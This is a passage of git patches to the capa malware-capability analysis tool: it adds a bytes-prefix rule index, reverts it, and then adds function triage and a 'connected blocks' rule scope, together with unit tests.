i, rule in enumerate(rules)} + rule_index_by_rule_name = self._rule_indexes_by_scopes[scope] # This algorithm is optimized to evaluate as few rules as possible, # because the less work we do, the faster capa can run. @@ -2003,23 +2030,33 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea if wanted_string.evaluate(string_features): candidate_rule_names.add(rule_name) - # Like with String/Regex features above, we have to scan for Bytes to find candidate rules. - # - # We may want to index bytes when they have a common length, like 16 or 32. - # This would help us avoid the scanning here, which would improve performance. - # The strategy is described here: - # https://github.com/mandiant/capa/issues/2128 - if feature_index.bytes_rules: - bytes_features: FeatureSet = {} - for feature, locations in features.items(): + # Like with String/Regex features above, Bytes features cannot be matched via hash lookup. + # To avoid a linear scan of every bytes rule against every extracted bytes feature, + # we bucket rule patterns by their first 4 bytes and only compare patterns whose prefix + # matches the extracted value. Patterns shorter than 4 bytes fall back to a linear scan. + # See: https://github.com/mandiant/capa/issues/2128 + if feature_index.bytes_prefix_rules or feature_index.bytes_short_rules: + bytes_values: list[bytes] = [] + has_short_rules = bool(feature_index.bytes_short_rules) + for feature in features: if isinstance(feature, capa.features.common.Bytes): - bytes_features[feature] = locations - - if bytes_features: - for rule_name, wanted_bytess in feature_index.bytes_rules.items(): - for wanted_bytes in wanted_bytess: - if wanted_bytes.evaluate(bytes_features): + assert isinstance(feature.value, bytes) + value = feature.value + if has_short_rules: + bytes_values.append(value) + if len(value) >= _BYTES_PREFIX_SIZE: + prefix = struct.unpack_from(">I", value)[0] + for rule_name, pattern in feature_index.bytes_prefix_rules.get(prefix, ()): + if value.startswith(pattern): + candidate_rule_names.add(rule_name) + + if has_short_rules and bytes_values: + # Short patterns do not have a fixed-length prefix bucket and require a linear scan. + for rule_name, pattern in feature_index.bytes_short_rules: + for value in bytes_values: + if value.startswith(pattern): candidate_rule_names.add(rule_name) + break # No rules can possibly match, so quickly return. if not candidate_rule_names: diff --git a/capa/rules/cache.py b/capa/rules/cache.py index 1a0d0c0261..621236228c 100644 --- a/capa/rules/cache.py +++ b/capa/rules/cache.py @@ -18,6 +18,7 @@ import pickle import hashlib import logging +import dataclasses from typing import Optional from pathlib import Path from dataclasses import dataclass @@ -164,8 +165,19 @@ def load_cached_ruleset(cache_dir: Path, rule_contents: list[bytes]) -> Optional # delete the cache that seems to be invalid. path.unlink() return None - else: - return cache.ruleset + + # Ensure loaded indexes have all fields declared by current dataclass definitions. + # This catches stale dev caches when _RuleFeatureIndex shape evolves. + try: + for feature_index in cache.ruleset._feature_indexes_by_scopes.values(): + for field in dataclasses.fields(feature_index): + getattr(feature_index, field.name) + except (AttributeError, TypeError): + logger.debug("rule set cache has incompatible structure (stale dev build): %s", path) + path.unlink() + return None + + return cache.ruleset def generate_rule_cache(rules_dir: Path, cache_dir: Path) -> bool: diff --git a/tests/test_match.py b/tests/test_match.py index 9e763bbc82..7ff31465e1 100644 --- a/tests/test_match.py +++ b/tests/test_match.py @@ -887,3 +887,132 @@ def test_index_features_nested_unstable(): assert not index.string_rules assert not index.bytes_rules + + +def test_bytes_prefix_index_correctness_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes prefix index + scopes: + static: function + dynamic: process + features: + - bytes: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + # 16 NOP bytes - exact match + _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 16): {0x0}}, 0x0) + assert "test bytes prefix index" in matches + + # 32 NOP bytes - startswith match + _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 32): {0x0}}, 0x0) + assert "test bytes prefix index" in matches + + # Different bytes should not match + _, matches = match([r], {capa.features.common.Bytes(b"\x00" * 16): {0x0}}, 0x0) + assert "test bytes prefix index" not in matches + + # Bytes shorter than pattern should not match + _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 8): {0x0}}, 0x0) + assert "test bytes prefix index" not in matches + + +def test_bytes_prefix_index_collision_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes prefix collision + scopes: + static: function + dynamic: process + features: + - bytes: 41 42 43 44 45 46 47 48 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + features = { + capa.features.common.Bytes(b"ABCD1234"): {0x0}, + capa.features.common.Bytes(b"ABCDEFGHzz"): {0x1}, + } + _, matches = match([r], features, 0x0) + assert "test bytes prefix collision" in matches + + +def test_bytes_prefix_index_short_pattern_fallback_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes short prefix fallback + scopes: + static: function + dynamic: process + features: + - bytes: 41 42 43 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + _, matches = match([r], {capa.features.common.Bytes(b"ABCDEF"): {0x0}}, 0x0) + assert "test bytes short prefix fallback" in matches + + _, matches = match([r], {capa.features.common.Bytes(b"XABCDEF"): {0x0}}, 0x0) + assert "test bytes short prefix fallback" not in matches + + +def test_bytes_prefix_index_mixed_short_and_long_patterns_unstable(): + """A rule with both a short (<4B) and a long (>=4B) bytes pattern exercises both code paths.""" + short_rule_text = textwrap.dedent( + """ + rule: + meta: + name: test short pattern rule + scopes: + static: function + dynamic: process + features: + - bytes: AA BB + """ + ) + long_rule_text = textwrap.dedent( + """ + rule: + meta: + name: test long pattern rule + scopes: + static: function + dynamic: process + features: + - bytes: CC DD EE FF 11 22 33 44 + """ + ) + short_rule = capa.rules.Rule.from_yaml(short_rule_text) + long_rule = capa.rules.Rule.from_yaml(long_rule_text) + + # Both rules match their respective extracted values. + features = { + capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}, + capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44\x55"): {0x1}, + } + _, matches = match([short_rule, long_rule], features, 0x0) + assert "test short pattern rule" in matches + assert "test long pattern rule" in matches + + # Only the short rule matches when the long pattern is absent. + _, matches = match([short_rule, long_rule], {capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}}, 0x0) + assert "test short pattern rule" in matches + assert "test long pattern rule" not in matches + + # Only the long rule matches when the short pattern is absent. + features_long_only = { + capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44"): {0x0}, + } + _, matches = match([short_rule, long_rule], features_long_only, 0x0) + assert "test short pattern rule" not in matches + assert "test long pattern rule" in matches From 553ef552a876a07b8e9f4ca5f149f86950793b52 Mon Sep 17 00:00:00 2001 From: devs6186 Date: Fri, 20 Mar 2026 02:51:43 +0530 Subject: [PATCH 6/7] Revert "rules: add 4-byte prefix index for bytes rule candidate selection" This reverts commit 0b0d1aff08ce7f0e2bfab8fc3d9c5fd7d22de6a3. --- CHANGELOG.md | 1 - capa/rules/__init__.py | 75 ++++++------------------ capa/rules/cache.py | 16 +---- tests/test_match.py | 129 ----------------------------------------- 4 files changed, 21 insertions(+), 200 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index d81b20a96c..636f864436 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -52,7 +52,6 @@ - doc: document that default output shows top-level matches only; -v/-vv show nested matches @devs6186 #1410 - doc: fix typo in usage.md, add documentation links to README @devs6186 #2274 -- rules: pre-filter bytes rule candidates by shared 4-byte prefixes to reduce hot-path bytes scanning @devs6186 #2128 - ci: deprecate macos-13 runner and use Python v3.13 for testing @mike-hunhoff #2777 ### Raw diffs diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index e50235feb6..da0a7d0360 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -18,7 +18,6 @@ import re import copy import uuid -import struct import logging import binascii import collections @@ -57,12 +56,6 @@ logger = logging.getLogger(__name__) -# Fixed prefix size used to pre-filter extracted bytes features. -# This narrows candidate selection from all extracted bytes to those -# sharing a common 4-byte prefix while keeping the implementation simple. -# See: https://github.com/mandiant/capa/issues/2128 -_BYTES_PREFIX_SIZE = 4 - # these are the standard metadata fields, in the preferred order. # when reformatted, any custom keys will come after these. META_KEYS = ( @@ -1447,9 +1440,6 @@ def __init__( self.rules = {rule.name: rule for rule in rules} self.rules_by_namespace = index_rules_by_namespace(rules) self.rules_by_scope = {scope: self._get_rules_for_scope(rules, scope) for scope in scopes} - self._rule_indexes_by_scopes = { - scope: {rule.name: i for i, rule in enumerate(self.rules_by_scope[scope])} for scope in scopes - } # these structures are unstable and may change before the next major release. scores_by_rule: dict[str, int] = {} @@ -1649,14 +1639,8 @@ class _RuleFeatureIndex: # All these features will be evaluated whenever a String feature is encountered. string_rules: dict[str, list[Feature]] # Mapping from rule name to list of Bytes features that have to match. - # Retained for logging and existing tests; candidate selection uses the prefix structures below. + # All these features will be evaluated whenever a Bytes feature is encountered. bytes_rules: dict[str, list[Feature]] - # Mapping from 4-byte prefix (as big-endian uint32) to list of (rule_name, pattern) pairs. - # Built once at index time so _match() can bucket-lookup instead of scanning all bytes rules. - bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] - # Rules whose patterns are shorter than _BYTES_PREFIX_SIZE bytes. - # These cannot be bucketed by prefix and require a linear scan fallback. - bytes_short_rules: list[tuple[str, bytes]] # this routine is unstable and may change before the next major release. @staticmethod @@ -1809,8 +1793,6 @@ def and_score_key(item): # Ideally we find a way to get rid of all of these, eventually. string_rules: dict[str, list[Feature]] = {} bytes_rules: dict[str, list[Feature]] = {} - bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] = collections.defaultdict(list) - bytes_short_rules: list[tuple[str, bytes]] = [] for rule in rules: rule_name = rule.meta["name"] @@ -1844,14 +1826,6 @@ def and_score_key(item): if bytes_features: bytes_rules[rule_name] = cast(list[Feature], bytes_features) - for bytes_feature in bytes_features: - assert isinstance(bytes_feature.value, bytes) - pattern = bytes_feature.value - if len(pattern) >= _BYTES_PREFIX_SIZE: - prefix = struct.unpack_from(">I", pattern)[0] - bytes_prefix_rules[prefix].append((rule_name, pattern)) - else: - bytes_short_rules.append((rule_name, pattern)) for feature in hashable_features: rules_by_feature[feature].add(rule_name) @@ -1865,9 +1839,7 @@ def and_score_key(item): "indexing: %d scanning string features, %d scanning bytes features", len(string_rules), len(bytes_rules) ) - return RuleSet._RuleFeatureIndex( - rules_by_feature, string_rules, bytes_rules, dict(bytes_prefix_rules), bytes_short_rules - ) + return RuleSet._RuleFeatureIndex(rules_by_feature, string_rules, bytes_rules) @staticmethod def _get_rules_for_scope(rules, scope) -> list[Rule]: @@ -1957,10 +1929,11 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea """ feature_index: RuleSet._RuleFeatureIndex = self._feature_indexes_by_scopes[scope] + rules: list[Rule] = self.rules_by_scope[scope] # Topologic location of rule given its name. # That is, rules with a lower index should be evaluated first, since their dependencies # will be evaluated later. - rule_index_by_rule_name = self._rule_indexes_by_scopes[scope] + rule_index_by_rule_name = {rule.name: i for i, rule in enumerate(rules)} # This algorithm is optimized to evaluate as few rules as possible, # because the less work we do, the faster capa can run. @@ -2030,33 +2003,23 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea if wanted_string.evaluate(string_features): candidate_rule_names.add(rule_name) - # Like with String/Regex features above, Bytes features cannot be matched via hash lookup. - # To avoid a linear scan of every bytes rule against every extracted bytes feature, - # we bucket rule patterns by their first 4 bytes and only compare patterns whose prefix - # matches the extracted value. Patterns shorter than 4 bytes fall back to a linear scan. - # See: https://github.com/mandiant/capa/issues/2128 - if feature_index.bytes_prefix_rules or feature_index.bytes_short_rules: - bytes_values: list[bytes] = [] - has_short_rules = bool(feature_index.bytes_short_rules) - for feature in features: + # Like with String/Regex features above, we have to scan for Bytes to find candidate rules. + # + # We may want to index bytes when they have a common length, like 16 or 32. + # This would help us avoid the scanning here, which would improve performance. + # The strategy is described here: + # https://github.com/mandiant/capa/issues/2128 + if feature_index.bytes_rules: + bytes_features: FeatureSet = {} + for feature, locations in features.items(): if isinstance(feature, capa.features.common.Bytes): - assert isinstance(feature.value, bytes) - value = feature.value - if has_short_rules: - bytes_values.append(value) - if len(value) >= _BYTES_PREFIX_SIZE: - prefix = struct.unpack_from(">I", value)[0] - for rule_name, pattern in feature_index.bytes_prefix_rules.get(prefix, ()): - if value.startswith(pattern): - candidate_rule_names.add(rule_name) - - if has_short_rules and bytes_values: - # Short patterns do not have a fixed-length prefix bucket and require a linear scan. - for rule_name, pattern in feature_index.bytes_short_rules: - for value in bytes_values: - if value.startswith(pattern): + bytes_features[feature] = locations + + if bytes_features: + for rule_name, wanted_bytess in feature_index.bytes_rules.items(): + for wanted_bytes in wanted_bytess: + if wanted_bytes.evaluate(bytes_features): candidate_rule_names.add(rule_name) - break # No rules can possibly match, so quickly return. if not candidate_rule_names: diff --git a/capa/rules/cache.py b/capa/rules/cache.py index 621236228c..1a0d0c0261 100644 --- a/capa/rules/cache.py +++ b/capa/rules/cache.py @@ -18,7 +18,6 @@ import pickle import hashlib import logging -import dataclasses from typing import Optional from pathlib import Path from dataclasses import dataclass @@ -165,19 +164,8 @@ def load_cached_ruleset(cache_dir: Path, rule_contents: list[bytes]) -> Optional # delete the cache that seems to be invalid. path.unlink() return None - - # Ensure loaded indexes have all fields declared by current dataclass definitions. - # This catches stale dev caches when _RuleFeatureIndex shape evolves. - try: - for feature_index in cache.ruleset._feature_indexes_by_scopes.values(): - for field in dataclasses.fields(feature_index): - getattr(feature_index, field.name) - except (AttributeError, TypeError): - logger.debug("rule set cache has incompatible structure (stale dev build): %s", path) - path.unlink() - return None - - return cache.ruleset + else: + return cache.ruleset def generate_rule_cache(rules_dir: Path, cache_dir: Path) -> bool: diff --git a/tests/test_match.py b/tests/test_match.py index 7ff31465e1..9e763bbc82 100644 --- a/tests/test_match.py +++ b/tests/test_match.py @@ -887,132 +887,3 @@ def test_index_features_nested_unstable(): assert not index.string_rules assert not index.bytes_rules - - -def test_bytes_prefix_index_correctness_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes prefix index - scopes: - static: function - dynamic: process - features: - - bytes: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) - - # 16 NOP bytes - exact match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 16): {0x0}}, 0x0) - assert "test bytes prefix index" in matches - - # 32 NOP bytes - startswith match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 32): {0x0}}, 0x0) - assert "test bytes prefix index" in matches - - # Different bytes should not match - _, matches = match([r], {capa.features.common.Bytes(b"\x00" * 16): {0x0}}, 0x0) - assert "test bytes prefix index" not in matches - - # Bytes shorter than pattern should not match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 8): {0x0}}, 0x0) - assert "test bytes prefix index" not in matches - - -def test_bytes_prefix_index_collision_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes prefix collision - scopes: - static: function - dynamic: process - features: - - bytes: 41 42 43 44 45 46 47 48 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) - - features = { - capa.features.common.Bytes(b"ABCD1234"): {0x0}, - capa.features.common.Bytes(b"ABCDEFGHzz"): {0x1}, - } - _, matches = match([r], features, 0x0) - assert "test bytes prefix collision" in matches - - -def test_bytes_prefix_index_short_pattern_fallback_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes short prefix fallback - scopes: - static: function - dynamic: process - features: - - bytes: 41 42 43 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) - - _, matches = match([r], {capa.features.common.Bytes(b"ABCDEF"): {0x0}}, 0x0) - assert "test bytes short prefix fallback" in matches - - _, matches = match([r], {capa.features.common.Bytes(b"XABCDEF"): {0x0}}, 0x0) - assert "test bytes short prefix fallback" not in matches - - -def test_bytes_prefix_index_mixed_short_and_long_patterns_unstable(): - """A rule with both a short (<4B) and a long (>=4B) bytes pattern exercises both code paths.""" - short_rule_text = textwrap.dedent( - """ - rule: - meta: - name: test short pattern rule - scopes: - static: function - dynamic: process - features: - - bytes: AA BB - """ - ) - long_rule_text = textwrap.dedent( - """ - rule: - meta: - name: test long pattern rule - scopes: - static: function - dynamic: process - features: - - bytes: CC DD EE FF 11 22 33 44 - """ - ) - short_rule = capa.rules.Rule.from_yaml(short_rule_text) - long_rule = capa.rules.Rule.from_yaml(long_rule_text) - - # Both rules match their respective extracted values. - features = { - capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}, - capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44\x55"): {0x1}, - } - _, matches = match([short_rule, long_rule], features, 0x0) - assert "test short pattern rule" in matches - assert "test long pattern rule" in matches - - # Only the short rule matches when the long pattern is absent. - _, matches = match([short_rule, long_rule], {capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}}, 0x0) - assert "test short pattern rule" in matches - assert "test long pattern rule" not in matches - - # Only the long rule matches when the short pattern is absent. - features_long_only = { - capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44"): {0x0}, - } - _, matches = match([short_rule, long_rule], features_long_only, 0x0) - assert "test short pattern rule" not in matches - assert "test long pattern rule" in matches From a101073cce6506c387641580bd1134a6c1e114fb Mon Sep 17 00:00:00 2001 From: devs6186 Date: Sat, 21 Mar 2026 22:39:26 +0530 Subject: [PATCH 7/7] static: add function triage and connected-block scope matching --- CHANGELOG.md | 3 + README.md | 16 ++ capa/capabilities/static.py | 138 +++++++++++-- capa/capabilities/triage.py | 202 ++++++++++++++++++++ capa/features/extractors/base_extractor.py | 8 + capa/features/extractors/viv/extractor.py | 22 +++ capa/ida/plugin/cache.py | 59 +++++- capa/ida/plugin/form.py | 11 +- capa/ida/plugin/model.py | 5 +- capa/loader.py | 2 +- capa/render/proto/__init__.py | 4 + capa/rules/__init__.py | 56 +++++- scripts/demo_connected_blocks_and_triage.py | 84 ++++++++ tests/test_capabilities.py | 25 +++ tests/test_connected_blocks.py | 158 +++++++++++++++ tests/test_proto.py | 12 ++ tests/test_rules_insn_scope.py | 36 ++++ tests/test_triage.py | 145 ++++++++++++++ 18 files changed, 963 insertions(+), 23 deletions(-) create mode 100644 capa/capabilities/triage.py create mode 100644 scripts/demo_connected_blocks_and_triage.py create mode 100644 tests/test_connected_blocks.py create mode 100644 tests/test_triage.py diff --git a/CHANGELOG.md b/CHANGELOG.md index 636f864436..2a5da92c2e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -8,6 +8,9 @@ - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 - vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 +- static: add function triage stage (skip/deprioritize/analyze logging) before function matching; library skip reporting unchanged +- static rules: add `connected blocks` scope/subscope with fixed depth=2 CFG neighborhoods and Vivisect CFG-edge support +- scripts: add `scripts/demo_connected_blocks_and_triage.py` to show triage counts and connected-block rule syntax ### Breaking Changes diff --git a/README.md b/README.md index 8a0fc9e9a3..890e4c6ab5 100644 --- a/README.md +++ b/README.md @@ -89,6 +89,22 @@ To use capa as a library or integrate with another tool, see [doc/installation.m **Documentation:** [Usage and tips](doc/usage.md) · [Installation](doc/installation.md) · [Limitations](doc/limitations.md) · [FAQ](doc/faq.md) +## static pipeline triage and connected blocks + +Recent static pipeline updates add: + +- **function triage** before full function matching: functions may be conservatively marked as skip/deprioritize using lightweight signals (library/flirt state, function size, API presence when available, thunk/runtime naming patterns). +- **connected blocks** static subscope syntax: + +```yaml +- connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile +``` + +Connected-block matching currently uses fixed CFG neighborhood depth `2` and is available when using a backend with CFG edge support (Vivisect). Other static backends return no CFG edges for this scope. + # capa Explorer Web The [capa Explorer Web](https://mandiant.github.io/capa/explorer/) enables you to interactively explore capa results in your web browser. Besides the online version you can download a standalone HTML file for local offline usage. diff --git a/capa/capabilities/static.py b/capa/capabilities/static.py index d485aa48c7..d97a7c8270 100644 --- a/capa/capabilities/static.py +++ b/capa/capabilities/static.py @@ -18,14 +18,17 @@ import itertools import collections from dataclasses import dataclass +from collections import deque import capa.perf import capa.helpers +import capa.engine import capa.features.freeze as frz import capa.render.result_document as rdoc from capa.rules import Scope, RuleSet from capa.engine import FeatureSet, MatchResults from capa.capabilities.common import Capabilities, find_file_capabilities +from capa.capabilities.triage import TriageDecision, classify_function, classify_library_function from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, StaticFeatureExtractor logger = logging.getLogger(__name__) @@ -110,11 +113,47 @@ def find_basic_block_capabilities( @dataclass class CodeCapabilities: function_matches: MatchResults + connected_block_matches: MatchResults basic_block_matches: MatchResults instruction_matches: MatchResults feature_count: int +def _build_connected_block_adjacency( + extractor: StaticFeatureExtractor, fh: FunctionHandle, bbs: tuple[BBHandle, ...] +) -> dict: + adjacency = fh.ctx.get("connected_blocks_adjacency") + if adjacency is not None: + return adjacency + + adjacency = collections.defaultdict(set) + bb_by_address = {bb.address: bb for bb in bbs} + for bb in bbs: + adjacency[bb.address] + for succ in extractor.get_cfg_edges(fh, bb): + if succ.address in bb_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + + fh.ctx["connected_blocks_adjacency"] = adjacency + return adjacency + + +def _collect_connected_neighborhood(adjacency: dict, seed, depth: int = 2) -> set: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + + def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, fh: FunctionHandle) -> CodeCapabilities: """ find matches for the given rules within the given function. @@ -126,33 +165,66 @@ def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, # matches found at the basic block scope. # might be found at different basic blocks, that's ok. bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) # matches found at the instruction scope. # might be found at different instructions, that's ok. insn_matches: MatchResults = collections.defaultdict(list) - for bb in extractor.get_basic_blocks(fh): - basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) - for feature, vas in basic_block_capabilities.features.items(): - function_features[feature].update(vas) - - for rule_name, res in basic_block_capabilities.basic_block_matches.items(): - bb_matches[rule_name].extend(res) - - for rule_name, res in basic_block_capabilities.instruction_matches.items(): - insn_matches[rule_name].extend(res) + has_connected_block_rules = bool(ruleset.connected_block_rules) + if has_connected_block_rules: + bbs = tuple(extractor.get_basic_blocks(fh)) + bb_features_by_address: dict = {} + for bb in bbs: + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + bb_features_by_address[bb.address] = basic_block_capabilities.features + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) + + adjacency = _build_connected_block_adjacency(extractor, fh, bbs) + for seed in bbs: + neighborhood = _collect_connected_neighborhood(adjacency, seed.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_address in neighborhood: + for feature, vas in bb_features_by_address.get(bb_address, {}).items(): + neighborhood_features[feature].update(vas) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, seed.address) + for rule_name, res in matches.items(): + connected_block_matches[rule_name].extend(res) + rule = ruleset[rule_name] + for va, _ in res: + capa.engine.index_rule_matches(function_features, rule, [va]) + else: + for bb in extractor.get_basic_blocks(fh): + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) for feature, va in itertools.chain(extractor.extract_function_features(fh), extractor.extract_global_features()): function_features[feature].add(va) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, fh.address) - return CodeCapabilities(function_matches, bb_matches, insn_matches, len(function_features)) + return CodeCapabilities(function_matches, connected_block_matches, bb_matches, insn_matches, len(function_features)) def find_static_capabilities( ruleset: RuleSet, extractor: StaticFeatureExtractor, disable_progress=None ) -> Capabilities: all_function_matches: MatchResults = collections.defaultdict(list) + all_connected_block_matches: MatchResults = collections.defaultdict(list) all_bb_matches: MatchResults = collections.defaultdict(list) all_insn_matches: MatchResults = collections.defaultdict(list) @@ -163,6 +235,7 @@ def find_static_capabilities( functions: list[FunctionHandle] = list(extractor.get_functions()) n_funcs: int = len(functions) n_libs: int = 0 + triage_counts: collections.Counter = collections.Counter() percentage: float = 0 with capa.helpers.CapaProgressBar( @@ -171,7 +244,27 @@ def find_static_capabilities( task = pbar.add_task( "matching", total=n_funcs, unit="functions", postfix=f"skipped {n_libs} library functions, {percentage}%" ) + triage_results: dict = {} + prioritized_functions: list[FunctionHandle] = [] + deprioritized_functions: list[FunctionHandle] = [] + skipped_functions: list[FunctionHandle] = [] for f in functions: + if extractor.is_library_function(f.address): + triage_counts[TriageDecision.SKIP.value] += 1 + classify_library_function(f) + prioritized_functions.append(f) + continue + triage = classify_function(extractor, f) + triage_results[f.address] = triage + triage_counts[triage.decision.value] += 1 + if triage.decision == TriageDecision.SKIP: + skipped_functions.append(f) + elif triage.decision == TriageDecision.DEPRIORITIZE: + deprioritized_functions.append(f) + else: + prioritized_functions.append(f) + + for f in itertools.chain(prioritized_functions, deprioritized_functions, skipped_functions): t0 = time.time() if extractor.is_library_function(f.address): function_name = extractor.get_function_name(f.address) @@ -185,6 +278,12 @@ def find_static_capabilities( pbar.advance(task) continue + triage = triage_results[f.address] + if triage.decision == TriageDecision.SKIP: + logger.debug("skipping triaged function %s (%s)", f.address, triage.reason) + pbar.advance(task) + continue + code_capabilities = find_code_capabilities(ruleset, extractor, f) feature_counts.functions += ( rdoc.FunctionFeatureCount( @@ -196,6 +295,7 @@ def find_static_capabilities( match_count = 0 for name, matches_ in itertools.chain( code_capabilities.function_matches.items(), + code_capabilities.connected_block_matches.items(), code_capabilities.basic_block_matches.items(), code_capabilities.instruction_matches.items(), ): @@ -212,6 +312,8 @@ def find_static_capabilities( for rule_name, res in code_capabilities.function_matches.items(): all_function_matches[rule_name].extend(res) + for rule_name, res in code_capabilities.connected_block_matches.items(): + all_connected_block_matches[rule_name].extend(res) for rule_name, res in code_capabilities.basic_block_matches.items(): all_bb_matches[rule_name].extend(res) for rule_name, res in code_capabilities.instruction_matches.items(): @@ -219,11 +321,22 @@ def find_static_capabilities( pbar.advance(task) + logger.debug( + "function triage summary: analyze=%d deprioritize=%d skip=%d (library=%d)", + triage_counts[TriageDecision.ANALYZE.value], + triage_counts[TriageDecision.DEPRIORITIZE.value], + triage_counts[TriageDecision.SKIP.value] - n_libs, + n_libs, + ) + # collection of features that captures the rule matches within function, BB, and instruction scopes. # mapping from feature (matched rule) to set of addresses at which it matched. function_and_lower_features: FeatureSet = collections.defaultdict(set) for rule_name, results in itertools.chain( - all_function_matches.items(), all_bb_matches.items(), all_insn_matches.items() + all_function_matches.items(), + all_connected_block_matches.items(), + all_bb_matches.items(), + all_insn_matches.items(), ): locations = {p[0] for p in results} rule = ruleset[rule_name] @@ -239,6 +352,7 @@ def find_static_capabilities( # and we can merge the dictionaries naively. all_insn_matches.items(), all_bb_matches.items(), + all_connected_block_matches.items(), all_function_matches.items(), all_file_capabilities.matches.items(), ) diff --git a/capa/capabilities/triage.py b/capa/capabilities/triage.py new file mode 100644 index 0000000000..b016b2d894 --- /dev/null +++ b/capa/capabilities/triage.py @@ -0,0 +1,202 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import logging +from enum import Enum +from dataclasses import dataclass + +import capa.features.insn +from capa.features.extractors.base_extractor import FunctionHandle, StaticFeatureExtractor + +logger = logging.getLogger(__name__) + + +REASON_DEFAULT = "analyze" +REASON_LIBRARY = "library/flirt function" +REASON_CRT_NAME = "crt/runtime function name pattern" +REASON_TINY_NO_API = "tiny function without API evidence" +REASON_THUNK = "thunk-like function" +REASON_RUNTIME_SECTION = "runtime section pattern" +REASON_LARGE_COMPLEXITY = "large function complexity" + +CRT_NAME_PREFIXES = ( + "__security_", + "__scrt_", + "__acrt_", + "__vcrt_", + "__chkstk", + "_chkstk", + "__gshandler", + "__cxx", + "_cxx", + "__initterm", + "_initterm", + "__crt", + "__imp_", + "_imp__", +) + +RUNTIME_SECTION_NAMES = { + ".init", + ".fini", + ".init_array", + ".fini_array", + ".ctors", + ".dtors", + ".plt", + ".plt.got", + ".plt.sec", +} + + +class TriageDecision(str, Enum): + ANALYZE = "analyze" + SKIP = "skip" + DEPRIORITIZE = "deprioritize" + + +@dataclass(frozen=True) +class TriageResult: + decision: TriageDecision + reason: str = REASON_DEFAULT + + +def _looks_like_runtime_name(name: str) -> bool: + lname = name.lower() + return lname.startswith(CRT_NAME_PREFIXES) or lname.startswith("j_") or lname.startswith("nullsub_") + + +def _get_function_name(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> str: + try: + return extractor.get_function_name(fh.address) + except KeyError: + return "" + + +def _get_section_name(fh: FunctionHandle) -> str: 